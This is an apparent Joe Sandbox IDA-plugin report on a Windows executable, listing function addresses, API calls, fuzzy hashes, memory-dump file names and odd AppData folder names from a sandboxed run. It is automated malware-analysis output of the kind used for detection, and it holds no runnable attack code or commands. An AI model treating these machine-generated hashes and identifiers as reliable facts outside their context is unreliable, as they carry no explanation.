Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: cd99531f96ac703a51573f19c9b8cc9de44b2267bcc9c0d579c2fc711e4bd44e
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 3AD0C972504520ABC2102738AE0889BBB55EB952717024B39FAA9A22B0CB304C568A98

Function 004056FB Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405701
GetLastError.KERNEL32 ref: 0040570F

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: e63be1853aafe68c2793134b37a867bebc3d2beebaf226ad42ac31f610d1a78e
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: 7CC04C30225602DBDA105B60DE087177A94AB90741F118439A146E21A0DA348415ED2D

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Function 00405CD7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A00,000000FF,00416A00,000000FF,000000FF,00000004,00000000), ref: 00405CEB

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: cd54f3301e23830850d9ea58ef2d9b6b3716dac1cb42590a0fcdec79a0e610d3
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 77E0EC3221425EABDF109E959C04EEB7B6CEB05360F048437FD16E2150D631E921ABA8

Function 00405CA8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CBC

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction ID: ab2ba72c7da8d0590a5026c7b9f2a747677d692c160b15db9e96a66b9068c41a
Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
Instruction Fuzzy Hash: 01E0EC3221425AABEF109E659C04EEB7B6CEB15361F104437F915F6150E631E861ABB4

Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
Instruction ID: 76e81b74098be2a3706baaa1e1a2527734eadd1478321fb398c06c814fc07831
Opcode Fuzzy Hash: 62695d5c8c86e882195e65ce0f7765e430518bd8f6887f1e42abcc260ebb5c8d
Instruction Fuzzy Hash: B5D05E33B05100DBDB10DFE8AE08ADD77B5AB80338B24817BE601F21E4D6B8C6509B1D

Function 00404160 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00010488,00000000,00000000,00000000), ref: 00404172

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
Instruction ID: c65f6eba747e04129790f2b1b21bae9375029ebd28d99582ecd6e8b4464eea9f
Opcode Fuzzy Hash: 13c84271a77af59bb4435d25b14bc6de72d6595d127670e1db8d8b2520383cf4
Instruction Fuzzy Hash: 56C09B717447007BDA119F609D4DF1777646764702F1544797344F51D0C774D450D61C

Function 00404149 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00403F75), ref: 00404157

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
Instruction ID: 10f0f1b1c79289e67bc844ccbe5aec3c597dbf8b190d8890215e27c6ac549869
Opcode Fuzzy Hash: 2cd36f0d48dcadf8a0967ef3185ed5b2b885b7484726fb5ce8841cd1b5828a50
Instruction Fuzzy Hash: 27B0123A180A00BBDE118B00EE0AF857E62F7AC701F018438B340250F0CAF300E0DB08

Function 00403258 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",00403536,?), ref: 00403266

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D

Function 00404136 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00403F0E), ref: 00404140

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
Instruction ID: 67e4992f565e21c11dbb8c54ac12ec2a13ba7de1e04ee321f93102ddb6e8c06b
Opcode Fuzzy Hash: 09484a4c0bb45b5d2a25c6d29655a2ab56222c5132b062e897c9f059ee403ea7
Instruction Fuzzy Hash: B2A00176944501EBCE129B90EF49D0ABB62EBE4701B5185B9A685900348A728862EB69

Non-executed Functions

Function 00404B2B Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404B43
GetDlgItem.USER32(?,00000408), ref: 00404B4E
GlobalAlloc.KERNEL32(00000040,?), ref: 00404B98
LoadBitmapW.USER32(0000006E), ref: 00404BAB
SetWindowLongW.USER32(?,000000FC,00405123), ref: 00404BC4
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BD8
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEA
SendMessageW.USER32(?,00001109,00000002), ref: 00404C00
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C0C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C1E
DeleteObject.GDI32(00000000), ref: 00404C21
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C4C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C58
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CEE
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D19
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D2D
GetWindowLongW.USER32(?,000000F0), ref: 00404D5C
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6A
ShowWindow.USER32(?,00000005), ref: 00404D7B
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E78
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EDD
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF2
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F16
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F36
ImageList_Destroy.COMCTL32(?), ref: 00404F4B
GlobalFree.KERNEL32(?), ref: 00404F5B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD4
SendMessageW.USER32(?,00001102,?,?), ref: 0040507D
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040508C
InvalidateRect.USER32(?,00000000,00000001), ref: 004050AC
ShowWindow.USER32(?,00000000), ref: 004050FA
GetDlgItem.USER32(?,000003FE), ref: 00405105
ShowWindow.USER32(00000000), ref: 0040510C

Strings

M, xrefs: 00404CD5
N, xrefs: 00404DB6
, xrefs: 004050E4

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
Instruction ID: 92be4e2f0a71e0becefd48613cebd317121b53e3330ca333a75e7b8088edbb55
Opcode Fuzzy Hash: 573b9ff58b83ee1454a1a693654ce7e624338e230ee879d58558bf43250699fe
Instruction Fuzzy Hash: 49027FB0900209EFDB209F95DD85AAE7BB5FB84314F10817AF610BA2E1C7799D42CF58

Function 004045AF Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004045FE
SetWindowTextW.USER32(00000000,?), ref: 00404628
SHBrowseForFolderW.SHELL32(?), ref: 004046D9
CoTaskMemFree.OLE32(00000000), ref: 004046E4
lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404716
lstrcatW.KERNEL32(?,: Completed), ref: 00404722
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404734

Part of subcall function 00405779: GetDlgItemTextW.USER32(?,?,00000400,0040476B), ref: 0040578C

Part of subcall function 004062E4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
Part of subcall function 004062E4: CharNextW.USER32(?,?,?,00000000), ref: 00406356
Part of subcall function 004062E4: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
Part of subcall function 004062E4: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\4Vx2rUlb0f.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E

GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 004047F7
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404812

Part of subcall function 0040496B: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A0C
Part of subcall function 0040496B: wsprintfW.USER32 ref: 00404A15
Part of subcall function 0040496B: SetDlgItemTextW.USER32(?,0042D248), ref: 00404A28

Strings

C:\Users\user\AppData\Local\neoimpressionism, xrefs: 004046FF
A, xrefs: 004046D2
: Completed, xrefs: 00404710, 00404715, 00404720

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\neoimpressionism
API String ID: 2624150263-2017731871
Opcode ID: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
Instruction ID: d238959ebaf25b01a045b7410cfe39ad7a074a1c0e4d09bd35cd2a97c430e078
Opcode Fuzzy Hash: 10e69ddc2ef15b09b644a8b6fb0d76715ac19094bf7e98a88b7b8229abe1abe5
Instruction Fuzzy Hash: 25A171B1900209ABDB11AFA5CD85AAFB7B8EF85314F10843BF601B72D1D77C89418B6D

Function 00402095 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114

Strings

C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer, xrefs: 00402154

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1829649472.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829690838.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829718865.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_4Vx2rUlb0f.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer
API String ID: 542301482-463683323
Opcode ID: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
Instruction ID: c02b05589a316e099dfb0d7529d526a00835c5092bff723ddb1c3c0439b696db
Opcode Fuzzy Hash: 2d60422b51706b5f8de98bdbfcbd79ecc62fd17b82eb2d48cb5e1808d9985389
Instruction Fuzzy Hash: E5412A71A00208AFCF00DFA4CD88AAD7BB6FF48314B24457AF515EB2D1DBB99A41CB54

Function 00407040 Relevance: 2.8, Strings: 2, Instructions: 300COMMON

Download Yara Rule

Strings

p!C, xrefs: 00407190, 004071B2, 00407262, 00407234, 004071B7
p!C, xrefs: 00407274

Memory Dump Source

Source File: 00000000.00000002.1829669806.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

